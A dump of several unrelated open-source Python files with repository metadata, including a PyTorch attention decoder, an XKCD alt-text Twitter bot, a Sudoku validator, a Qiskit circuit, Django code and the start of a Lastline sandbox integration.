encoder_outputs = self.bert_encoded_lin(encoder_outputs)
# Get current hidden state from input word and last hidden state
rnn_output, hidden = self.gru(embedded, last_hidden) #rnn output: [1 x Batch x Hidden], hidden: [1 x Batch x Hidden]
#print("hidden ", hidden.shape)
# Calculate attention from current RNN state and all encoder outputs;
# apply to encoder outputs to get weighted average
attn_weights = self.attn(rnn_output, encoder_outputs) #attn_weights : [Batch x 1 x Seq]
context = attn_weights.bmm(encoder_outputs) #context: [Batch x 1 x Hidden]
# Attentional vector using the RNN hidden state and context vector
# concatenated together (Luong eq. 5)
rnn_output = rnn_output.squeeze(0) # rnn_output is now: [Batch x Hidden]
context = context.squeeze(1) # context is now: [Batch x Hidden]
concat_input = torch.cat((rnn_output, context), 1)
concat_output = torch.tanh(self.concat(concat_input))
# Finally predict next token (Luong eq. 6, without softmax)
output = self.out(concat_output) #output is : [Batch*output_size] (output size is the number of all vocabs)
# Return final output, hidden state, and attention weights (for visualization)
return output, hidden, attn_weights
class BahdanauAttnDecoderRNN(nn.Module):
def __init__(self,attn_model, hidden_size, output_size, n_layers=1, dropout_p=0.1):
super(BahdanauAttnDecoderRNN, self).__init__()
assert attn_model == 'concat'
# Define parameters
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.dropout_p = dropout_p
# Define layers
self.embedding = nn.Embedding(output_size, hidden_size)
self.embedding_dropout = nn.Dropout(dropout_p)
self.attn = Attn('concat', hidden_size)
self.gru = nn.GRU(hidden_size*2, hidden_size, n_layers, dropout=dropout_p)
self.out = nn.Linear(hidden_size, output_size)
def forward(self, input_seq, last_hidden, encoder_outputs):
# Note: we run this one step at a time
# input_seq : [batch_size], something like torch.LongTensor([SOS_token] * small_batch_size)
# last_hidden: last elemnt of decoder_outputs [1 x batch_size x hidden]
# encoder_outputs: [batch_size x seq x hidden]
batch_size = input_seq.size(0)
embedded = self.embedding(input_seq)
embedded = self.embedding_dropout(embedded)
embedded = embedded.view(1, batch_size, self.hidden_size) # embedded: [1 x Batch x hidden]
# Calculate attention weights and apply to encoder outputs
#last_hidden[-1]: [Batch x hidden], last_hidden[-1].unsqueeze(0): [1 x Batch x hidden]
last_hidden = last_hidden.view(1,batch_size, self.hidden_size)
attn_weights = self.attn(last_hidden, encoder_outputs) #attn_weights : [Batch x 1 x Seq]
context = attn_weights.bmm(encoder_outputs) #context: [Batch x 1 x Hidden]
context = context.transpose(0, 1) #context: [1 x Batch x Hidden]
# Combine embedded input word and attended context, run through RNN
rnn_input = torch.cat((embedded, context), 2) #rnn_input: [1 x Batch x Hidden*2]
rnn_input = rnn_input.contiguous(); last_hidden = last_hidden.contiguous()
output, hidden = self.gru(rnn_input, last_hidden) #output: [1 x Batch x Hidden], hidden: [1 x Batch x Hidden]
# Final output layer
output = output.squeeze(0) # output: [Batch x Hidden]
#context = context.squeeze(0) # context: [Batch x Hidden]
#output = F.log_softmax(self.out(torch.cat((output, context), 1))) #output: [Batch*output_size]
output = F.log_softmax(self.out(output), dim=1) #output: [Batch*output_size]
# Return final output, hidden state, and attention weights (for visualization)
return output, hidden, attn_weights
| [
"jointparalearning@jointparalearning.com"
] | jointparalearning@jointparalearning.com |
4756fbcfb9c7db0ebaf8e40767267cae76c6d7ea | 7150c2837847ec1bbbb61c446508b707f81ddf68 | /lesson3.py | 8ac1203657c60f34fb5d4b2db06fbfefdd3f4344 | [] | no_license | elisabethboeck-aea/PythonKurs_01_20210119 | 63dc3f3d913c0fa57b8e023506b4a053dae25174 | 9cc3f68583c35b0c31d74acdc840a255aa51d00a | refs/heads/master | 2023-05-06T22:34:50.010815 | 2021-05-20T07:01:14 | 2021-05-20T07:01:14 | 362,727,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | # Beispiel: Eingabe Zahl zwischen 1 und 100, alle Zahlen bis zu Eingabe werden gezeigt, wenn Ausgabezahl/3 dann wird "fizz" ausgegeben, bei /5 "buzz"
# wenn beides zutrifft (/3 und /5) "fizzbuzz"
# Anmerkung: % ist der der modulo Opperator, dieser prüft, ob bei Division ein Rest bleibt. Für Prozentrechnung muss tatsächlich /100 dividiert werden!
end_zahl = int(input("Bitte Zahl zwischen 1 und 100 eingeben: "))
for number in range(1, end_zahl + 1):
if number % 3 == 0 and number % 5 == 0:
print("fizzbuzz")
elif number % 3 == 0:
print ("fizz")
elif number % 5 == 0:
print("buzz")
else:
print(number)
| [
"elisabeth.boeck@energyagency.at"
] | elisabeth.boeck@energyagency.at |
4b76105a93032dcd86dc1fa2804ef0f2d9762700 | e8905aa363484abb197553fa516aea315238048f | /xkcd_alt.py | ced7662a57f6579a035d1d4128872e6f4a9b8241 | [
"MIT"
] | permissive | baogianghoangvu/XKCDAltTextBot | 6085d45579d28c0e7933fbbdd8fad5c8206a8cd3 | f6533c303c215c0db6e3e0e987cc51ae1c3c8c33 | refs/heads/master | 2023-05-18T13:34:29.035674 | 2021-06-06T15:19:32 | 2021-06-06T15:19:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,672 | py | """This is the XKCD Alt Text Bot.
This bot checks once every 15 seconds for new Tweets from a target bot. If one is found, it accesses
the linked image, extracts the image alt text, and Tweets it as a reply."""
import time # Program sleeping
import datetime # Cancels Tweet if older than 6 hours
import calendar # Converts calendar abbreviation to integer
from dateutil.tz import gettz # Switches to UTC in recent Tweet check
import yaml # API keys, access tokens, and custom logs
import os # Used by Heroku for environmental variable
import math # Round up number of tweets needed
import re # Finds the most recent bot tweet
import requests # Accessing API
from requests_oauthlib import OAuth1 # OAuth
from bs4 import BeautifulSoup # HTML searching
# Global vars
LOG_NAME = None
BOT = None
TARGET = None
WHERE = 0
URL_NUMBER = 0
class Twitter():
"""This class handles all API requests to Twitter."""
def __init__(self, auth):
"""This class constructor collects the OAuth keys for the class."""
self.auth = auth
def get(self):
"""This function determines if a new Tweet has been posted, and returns it.
Mentions of 'target' refer to the target Twitter bot, mentions of 'bot' or 'this' refer to this Twitter bot."""
# Build payloads for source bot and this bot retrieval
bot_payload = {'screen_name': '{}'.format(BOT), 'count': '10'}
target_payload = {'screen_name': '{}'.format(TARGET), 'count': '1'}
# Retrieve data from Twitter retrievals
for attempt in range(6):
if attempt == 5: # Too many attempts
print('Twitter retrieval failed ({}), see below response.'.format(str(target_raw.status_code)))
print('Twitter error message:\n\n{}'.format(target_raw.json()))
del bot_payload, target_payload
return 'crash' # Enter log protection mode
print('Retrieving new {}s...'.format(LOG_NAME))
bot_raw = requests.get('https://api.twitter.com/1.1/statuses/user_timeline.json',
params=bot_payload, auth=self.auth)
target_raw = requests.get('https://api.twitter.com/1.1/statuses/user_timeline.json',
params=target_payload, auth=self.auth)
if target_raw.status_code == 200: # Good request
pass
elif target_raw.status_code >= 429 or target_raw.status_code == 420:
# Twitter issue or rate limiting
print('Twitter retrival failed ({})'.format(target_raw.status_code))
print('Reattempting in 5 minutes...')
time.sleep(300) # sleep for 5 minutes and reattempt
continue
else: # Other problem in code
print('Twitter retrieval failed ({}), see below '.format(str(target_raw.status_code)) +
'response.')
print('Twitter error message:\n\n{}'.format(target_raw.json()))
del bot_payload, target_payload, bot_raw, target_raw
return 'crash' # Enter log protection mode
# Convert to JSON
bot_json = bot_raw.json()
target_json = target_raw.json()
# Create a list of all reply IDs
bot_replies = [bot_json[i]['in_reply_to_status_id'] for i in
range(len(bot_json))]
try:
if target_json[0]['id'] is None:
print('Twitter retrieval failed: No Tweet found')
del bot_payload, target_payload, bot_raw, target_raw, bot_json, target_json
return 'crash' # Enter log protection mode
except IndexError:
print('Twitter retrieval failed: No Tweet found')
del bot_payload, target_payload, bot_raw, target_raw, bot_json, target_json
return 'crash' # Enter log protection mode
for i in range(len(bot_replies)):
if bot_replies[i] == target_json[0]['id']:
try:
if bot_json[i]['retweeted_status'] is not None:
continue # Retweet, keep going
except KeyError:
return None # Already replied, sleep for 15 seconds
# Do not reply to tweets older than 6 hours
tweet_time_str = datetime.datetime(
int(target_json[0]['created_at'][-4:]),
list(calendar.month_abbr).index(target_json[0]['created_at'][4:7]),
int(target_json[0]['created_at'][8:10]),
int(target_json[0]['created_at'][11:13]),
int(target_json[0]['created_at'][14:16]),
int(target_json[0]['created_at'][17:19]),
0,
gettz('UTC')
)
tweet_time = time.mktime(tweet_time_str.timetuple())
del bot_payload, target_payload, bot_raw, target_raw, bot_json
if time.mktime(datetime.datetime.utcnow().timetuple()) - tweet_time > 21600:
del target_json
return None # Tweet is too old
else:
return target_json[0] # Return target Tweet
def post(self, tweet, reply):
"""This function Tweets the alt (title) text as a reply to the target account."""
print('Tweeting...')
tweet_payload = {'status': tweet, 'in_reply_to_status_id': reply,
'auto_populate_reply_metadata': 'true'}
# POST Tweet
for attempt in range(6):
if attempt == 5: # Too many attempts
print('Tweeting failed ({}), see below response.'.format(str(tweet.status_code)))
print('Twitter error message:\n\n{}'.format(tweet.json()))
del tweet_payload
return 'crash' # Enter log protection mode
tweet = requests.post('https://api.twitter.com/1.1/statuses/update.json',
data=tweet_payload, auth=self.auth)
if tweet.status_code == 200: # Good request
print('Successfully Tweeted:\n\n{}'.format(tweet.json()))
del tweet_payload
return tweet.json()
elif tweet.status_code >= 429 or tweet.status_code == 420 or \
tweet.status_code == 403:
if tweet.json()['errors'][0]['code'] == 187: # Duplicate Tweet
print('Duplicate Tweet detected, ending attempt.')
return None
# Twitter issue or rate limiting
print('Tweeting failed ({})'.format(tweet.status_code))
print('Reattempting in 5 minutes...')
time.sleep(300) # sleep for 5 minutes and reattempt
continue
else: # Other problem in code
print('Tweeting failed ({}), see below response.'.format(str(tweet.status_code)))
print('Twitter error message:\n\n{}'.format(tweet.json()))
del tweet, tweet_payload
return 'crash' # Enter log protection mode
def tweetstorm(self, body, num_tweets, orig_tweet):
"""This function posts a chain of tweets if the full Tweet is longer than 280 characters."""
seek = 0 # Location in body of text
for n in range(num_tweets): # Post each individual tweet // twit: a short tweet
if (n+1) < num_tweets:
endspace = body[seek:seek+280].rfind(' ') # Find the last space under 280 chars
twit = body[seek:endspace] # Get up to 280 chars of full words
else: # Final tweet
twit = body[seek:] # Use the remaining characters
if n == 0:
result = self.post(twit, orig_tweet) # Reply to the original tweet
else:
result = self.post(twit, reply_to) # Reply to the previous tweet
if result == 'crash':
return 'crash' # Enter log protection mode
reply_to = result['id_str'] # Tweet for next twit to reply to
seek += endspace + 1 # Start the next sequence from after the space
return None
def get_config():
"""This function retrieves API keys, access tokens, and other key data from the config file."""
global LOG_NAME, TARGET, URL_NUMBER, WHERE, BOT
print("Building OAuth header...")
if 'XKCD_APPNAME' in os.environ: # Running on a cloud server
key = [os.environ.get('API_KEY', None),
os.environ.get('API_SECRET_KEY', None),
os.environ.get('ACCESS_TOKEN', None),
os.environ.get('ACCESS_TOKEN_SECRET', None)]
LOG_NAME = os.environ.get('LOG_NAME', None)
TARGET = os.environ.get('TARGET', None)
URL_NUMBER = int(os.environ.get('URL_NUMBER', None))
WHERE = int(os.environ.get('WHERE', None))
BOT = os.environ.get('BOT', None)
else: # Running locally
with open('config.yaml') as config_file:
CONFIG = yaml.safe_load(config_file)
key = [CONFIG['API Key'],
CONFIG['API Secret Key'],
CONFIG['Access Token'],
CONFIG['Access Token Secret']]
LOG_NAME = CONFIG['Target name in logs']
TARGET = CONFIG['Target account handle']
URL_NUMBER = int(CONFIG['Tweet URL location'])
WHERE = int(CONFIG['Target image location on site'])
BOT = CONFIG['Your account handle']
for i in key:
if i is None: # Verify keys were loaded
print("OAuth initiation failed: API key or access token not found")
del key
return 'crash' # Enter log protection mode
auth = OAuth1(key[0], key[1], key[2], key[3])
print('OAuth initiation successful!')
del key
return auth
def retrieve_text(site):
"""This retrieves the HTML of the website, isolates the image title text, and formats it for the
Tweet."""
for attempt in range(11):
print('Accessing {} (attempt {} of 11)'.format(site, attempt+1))
html_raw = requests.get(site) # Retrieving raw HTML data
if html_raw.status_code != 200: # Data not successfully retrieved
if attempt < 6:
print('Could not access {} ({}). '.format(LOG_NAME, html_raw.status_code) +
'Trying again in 10 seconds...')
time.sleep(10) # Make 6 attempts with 10 second delays
elif attempt < 10:
print('Could not access {} ({}). '.format(LOG_NAME, html_raw.status_code) +
'Trying again in 60 seconds...')
time.sleep(60) # Make 4 attempts with 60 seconds delays
else:
print('{} retrieval failed: could not access {}'.format(LOG_NAME, site))
return 'crash' # Enter log protection mode
else: # Data retrieved
break
html = BeautifulSoup(html_raw.text, 'html.parser')
target_image = html.find_all('img', title=True) # Locates the only image with title text (the target)
if target_image is None:
print('Title extraction failed: image not found')
return 'crash' # Enter log protection mode
title = target_image[WHERE]['title'] # Extracts the title text
tweet_title = 'Title text: "{}"'.format(title)
# This block acts as a Tweet 'header'
tweet_header_size = 36 # URL is 23 chars
tweet_header = 'Alt text @ https://www.explainxkcd.com/wiki/index.php/{}#Transcript'.format(site[-5:-1]) + '\n\n'
tweet = tweet_header + tweet_title
if (len(tweet_title) + tweet_header_size) <= 280: # Char limit, incl. link
num_tweets = 1 # The number of tweets that must be created
else:
num_tweets = math.ceil((len(tweet_title) + tweet_header_size) / 280)
print('Tweet constructed')
del html_raw, html, target_image, title
return [tweet, num_tweets]
def crash():
"""This function protects logs by pinging google.com every 20 minutes."""
print('Entering log protection mode.')
while True:
a = requests.get('https://google.com') # Ping Google
del a
time.sleep(1200)
continue
if __name__ == '__main__':
# All mentions of 'crash' mean the program has crashed, and is entering log protection mode
auth = get_config() # Build authentication header and get config data
new_tweet_check = [0, None]
if auth == 'crash':
crash()
twitter = Twitter(auth)
while True: # Initialize main account loop
if new_tweet_check[0] > 3: # Too many attempts
print('Verification failed.')
new_tweet_check = [0, None]
continue
else:
original_tweet = twitter.get() # Check for new Tweets
if original_tweet == 'crash':
new_tweet_check = [0, None]
crash()
elif original_tweet is None:
print('No new {}s found. Sleeping for 15 seconds...'.format(LOG_NAME))
if new_tweet_check[0] > 0:
new_tweet_check[0] += 1
time.sleep(15)
else:
if new_tweet_check[1] is None: # Unverified new Tweet
new_tweet_check[1] = original_tweet['id']
print('Potential new {}. Waiting 5 seconds to verify...'.format(LOG_NAME))
time.sleep(5)
elif new_tweet_check[1] == original_tweet['id']: # Confirmed new Tweet
[body, num_tweets] = retrieve_text(original_tweet['entities']['urls'][URL_NUMBER]['expanded_url'])
if body == 'crash':
new_tweet_check = [0, None]
crash()
if num_tweets == 1:
result = twitter.post(body, original_tweet['id_str']) # Post one Tweet
else:
result = twitter.tweetstorm(body, num_tweets, original_tweet['id_str']) # Split into multiple Tweets
if result == 'crash':
new_tweet_check = [0, None]
crash()
else: # Successful Tweet
del result
print('Sleeping for 60 seconds...')
time.sleep(60)
new_tweet_check = [0, None]
else:
print('Twitter retrieval returned existing {}. Sleeping for 5 seconds...'.format(LOG_NAME))
new_tweet_check[0] += 1
time.sleep(5) | [
"rod.cam2014+dev@gmail.com"
] | rod.cam2014+dev@gmail.com |
617ade26306cc5241efc576079948c01168031fc | d3fbf48dcec6fa464ce2f1fd2c7e4adaf7c70021 | /tempOrder.py | 562d0e737e61a11c1b1b247c11e422cbab6741ba | [
"BSD-2-Clause"
] | permissive | anirudh9119/trainingRNNs | 26e3353ad505da3e2b93fd5973df8dd5e70f1ecd | fd64d608fe05d52306b6d6c24de428a6ebba9ac6 | refs/heads/master | 2021-01-22T00:10:30.583372 | 2016-01-14T21:01:46 | 2016-01-14T21:01:46 | 49,674,713 | 0 | 1 | null | 2016-01-14T20:57:46 | 2016-01-14T20:57:46 | null | UTF-8 | Python | false | false | 3,653 | py | # Copyright (c) 2012-2013, Razvan Pascanu
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Generate input and test sequence for the temporal order task.
Description
-----------
The input has 6 channels. At any time all channels are 0 except for one
which has value 1 (i.e. the 6 channels are used for a one-hot encoding
of a 6 possible symbols).
The first two channels are reserved for symbols {A, B}, the others
to {c,d,e,f}. At one random position `p0` in [1, L/10] either A or B
is showed. The same happens at a second position `p1` in [5*L/10, 6*L/10].
At all other position a random symbol from {c,d,e,f} is used.
At the end of the sequence one has to predict the order in which the
symbols where provided (either AA, AB, BA or BB).
Author: Razvan Pascanu
contact: r.pascanu@gmail
"""
import numpy
class TempOrderTask(object):
def __init__(self, rng, floatX):
self.rng = rng
self.floatX = floatX
self.nin = 6
self.nout = 4
self.classifType='lastSoftmax'
def generate(self, batchsize, length):
l = length
p0 = self.rng.randint(int(l*.1), size=(batchsize,)) + int(l*.1)
v0 = self.rng.randint(2, size=(batchsize,))
p1 = self.rng.randint(int(l*.1), size=(batchsize,)) + int(l*.5)
v1 = self.rng.randint(2, size=(batchsize,))
targ_vals = v0 + v1*2
vals = self.rng.randint(4, size=(l, batchsize))+2
vals[p0, numpy.arange(batchsize)] = v0
vals[p1, numpy.arange(batchsize)] = v1
data = numpy.zeros((l, batchsize, 6), dtype=self.floatX)
targ = numpy.zeros((batchsize, 4), dtype=self.floatX)
data.reshape((l*batchsize, 6))[numpy.arange(l*batchsize),
vals.flatten()] = 1.
targ[numpy.arange(batchsize), targ_vals] = 1.
return data, targ
if __name__ == '__main__':
print 'Testing temp Order task generator ..'
task = TempOrderTask(numpy.random.RandomState(123), 'float32')
seq, targ = task.generate(3, 25)
assert seq.dtype == 'float32'
assert targ.dtype == 'float32'
print 'Sequence 0'
print '----------'
print seq[:,0,:]
print 'Target:', targ[0]
print
print 'Sequence 1'
print '----------'
print seq[:,1,:]
print 'Target:', targ[1]
print
print 'Sequence 2'
print '----------'
print seq[:,2,:]
print 'Target', targ[2]
| [
"pascanur@iro"
] | pascanur@iro |
db3fbff4d594a4433e3b7910b144df9651be1e38 | c5ff1fa771515f699e8dd08b51815d9f4f938f6f | /comments/migrations/0001_initial.py | ab972431ff08043da7a4e60a02994c93c8b78d91 | [] | no_license | tungnm06/DjangoInstagram | a0ed56191e64df752adcd9e8357cea0f6c17f860 | 70ad031939eea41af9f7f7945f66b6cc930de870 | refs/heads/master | 2020-03-25T09:30:41.414415 | 2018-08-06T03:14:55 | 2018-08-06T03:14:55 | 143,670,323 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | # Generated by Django 2.0.7 on 2018-07-18 19:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('customers', '0001_initial'),
('posts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('createtime', models.DateTimeField()),
('updatetime', models.DateTimeField()),
('status', models.IntegerField(default=1)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='customers.Customer')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.Post')),
],
),
]
| [
"tungnmd00439@fpt.edu.vn"
] | tungnmd00439@fpt.edu.vn |
93ceaaa0837665bdb5b617142ac9666feb369a25 | d26b4c0eb87ccd861ff99d7b78bb052cd5d3e421 | /python/SudokuValidator/main.py | 4fefd3635260994b5c5e473bff8ff5a758aa54b6 | [] | no_license | ngoodman90/CodingGame | 6ad8226253b94cc20c18bdd019b3c880301017ff | 529da15a964f92e5407522cea0c9b7a7063c05eb | refs/heads/master | 2021-01-10T07:07:30.880015 | 2020-05-08T13:36:23 | 2020-05-08T13:36:23 | 48,571,145 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | # https://www.codingame.com/training/easy/sudoku-validator
from itertools import chain
expected_values = list(range(1, 10))
def is_row_valid(row):
return sorted(row) == expected_values
def squares(grid):
yield grid[0][:3] + grid[1][:3] + grid[2][:3]
yield grid[3][:3] + grid[4][:3] + grid[5][:3]
yield grid[6][:3] + grid[7][:3] + grid[8][:3]
yield grid[0][3:6] + grid[1][3:6] + grid[2][3:6]
yield grid[3][3:6] + grid[4][3:6] + grid[5][3:6]
yield grid[6][3:6] + grid[7][3:6] + grid[8][3:6]
yield grid[0][6:9] + grid[1][6:9] + grid[2][6:9]
yield grid[3][6:9] + grid[4][6:9] + grid[5][6:9]
yield grid[6][6:9] + grid[7][6:9] + grid[8][6:9]
def columns(grid):
for i in range(9):
yield [row[i] for row in grid]
def is_grid_valid(grid):
return all(is_row_valid(row) for row in chain(grid, columns(grid), squares(grid)))
grid = [list(map(int, input().split())) for _ in range(9)]
print(str(is_grid_valid(grid)).lower())
| [
"ngoodman90@gmail.com"
] | ngoodman90@gmail.com |
2cbcad6a307bd6d1b5101f9e5781d7caaa236d91 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_QC1087.py | 70d9c4bc57bcaa206e68809763018b4b54d22d38 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,454 | py | # qubit number=5
# total number=50
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=31
prog.cz(input_qubit[1],input_qubit[0]) # number=32
prog.h(input_qubit[0]) # number=33
prog.h(input_qubit[1]) # number=44
prog.cz(input_qubit[0],input_qubit[1]) # number=45
prog.h(input_qubit[1]) # number=46
prog.cx(input_qubit[0],input_qubit[1]) # number=47
prog.x(input_qubit[1]) # number=48
prog.cx(input_qubit[0],input_qubit[1]) # number=49
prog.cx(input_qubit[0],input_qubit[1]) # number=42
prog.x(input_qubit[0]) # number=26
prog.cx(input_qubit[1],input_qubit[0]) # number=27
prog.h(input_qubit[1]) # number=37
prog.cz(input_qubit[0],input_qubit[1]) # number=38
prog.h(input_qubit[1]) # number=39
prog.x(input_qubit[1]) # number=35
prog.cx(input_qubit[0],input_qubit[1]) # number=36
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
prog.cx(input_qubit[3],input_qubit[2]) # number=43
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.cx(input_qubit[0],input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
prog.cx(input_qubit[0],input_qubit[1]) # number=24
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[1]) # number=29
prog.y(input_qubit[4]) # number=28
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC1087.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
5d6a826d059bd746ecd573c62d7103f05c0451af | 9a1e3d298ef432ba3e71eb3c2d5fbfc7d79ac0fb | /jukebox_pro/urls.py | b2a055badf6229e085230049d9d6b9a17f266e64 | [] | no_license | biswaranjan8/jukebox | 963a3eb943bd3ecee7c053299ec304f3bd47b669 | 2562c926cdf13d8d831db515c1ed484b9e6ad83e | refs/heads/main | 2023-04-04T05:33:40.082094 | 2021-04-13T17:26:27 | 2021-04-13T17:26:27 | 356,554,444 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | from django.contrib import admin
from django.urls import path
from myapp import views
from myapp.views import MusiciansViewSet, Music_AlbumsViewSet
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
router.register(r'musician', MusiciansViewSet, basename='musician')
router.register(r'musician_album', Music_AlbumsViewSet, basename='musician_album')
urlpatterns = router.urls
####################
# musician_album list => url "musician_album" request(get)
# musician_album Retrieve=> url "musician_album/(musician_album-id)" request(get)
# musician_album Create => url "/musician_album/" request(post) data_fields("musician","album_name","genre","price","description")
# musician_album_Update => url "musician_album/(musician_album-id)/" request(put) data_fields("musician","album_name","genre","price","description")
# musician_album_Delete => url "musician_album/(musician_album-id)/" request(delete)
# Musician list => url "musician" request(get)
# Musician Retrieve=> url "musician/(musician-id)" request(get)
# Musician Create => url "/musician/" request(post) data_fields("name","musician_type")
# Musician_Update => url "musician/(musician-id)/" request(put) data_fields("name","musician_type")
# Musician_Delete => url "musician/(musician-id)/" request(delete)
# List Of Music Album Sorted By date release ascending
# url => "musicalbum_retrieve/" request(get)
# List Of Music Album for a specific musician sorted by price ascending
# url => "musician_filter_price/(musician-id)/" request(get)
# List of Musician for specific music album sorted by Musician name ascending
# url => "musician_filter/(album-name)/" request(get)
####################
urlpatterns += [
path('admin/', admin.site.urls),
path('musicalbum_retrieve/', views.MusicAlbumRetrieve.as_view(), name='musicalbum_retrieve'),
path('musician_filter_price/<int:id>/', views.MusicAlbumFilterPrice.as_view(), name='MusicAlbumFilterPrice'),
path('musician_filter/<str:name>/', views.MusicAlbumFilter.as_view(), name='MusicAlbumFilter'),
]
| [
"nayakbn00@gmail.com"
] | nayakbn00@gmail.com |
9fda3ccf511019282d092f6d875ce3a82a9da52b | 1d8df63c441566f919bcd484c6d621a5e227d34a | /Integrations/Lastline_v2/Lastline_v2.py | 0668ac943f667a8fc5e31c8962415ca59db361fe | [
"MIT"
] | permissive | vvbaliga/content | 92b92d16dbbe4394c266e8cfce24abd2b92182b7 | cfc13a269b5e367f3219f42dafdfc23aa500e22f | refs/heads/master | 2021-01-04T02:14:19.919095 | 2020-02-13T14:22:22 | 2020-02-13T14:22:22 | 240,338,196 | 1 | 0 | MIT | 2020-02-13T18:59:47 | 2020-02-13T18:59:46 | null | UTF-8 | Python | false | false | 11,183 | py | import hashlib
from typing import Dict, List
from urllib3 import disable_warnings
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
# Command prefix and display name used when registering this integration's commands.
INTEGRATION_COMMAND_NAME = "lastline"
INTEGRATION_NAME = "Lastline v2"
# Suppress urllib3 "insecure request" warnings (emitted when TLS verification is disabled).
disable_warnings()
class Client(BaseClient):
MD5_LEN = 32
SHA1_LEN = 40
SHA256_LEN = 64
DEFAULT_THRESHOLD = 70
def __init__(self, base_url: str, api_params: Dict, verify=True, proxy=False):
self.command_params = api_params
super(Client, self).__init__(base_url, verify, proxy)
def file(self):
human_readable = ''
context_entry: Dict = {
'Lastline': list(),
'File': list(),
'DBotScore': list()
}
result = list()
